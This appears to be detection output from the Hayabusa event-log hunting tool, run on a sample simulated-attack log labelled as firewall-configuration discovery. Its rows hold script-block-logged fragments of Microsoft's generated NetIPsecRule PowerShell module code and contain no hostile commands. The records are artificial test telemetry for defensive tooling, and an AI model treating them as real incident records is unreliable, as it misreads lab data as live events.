Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue =,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 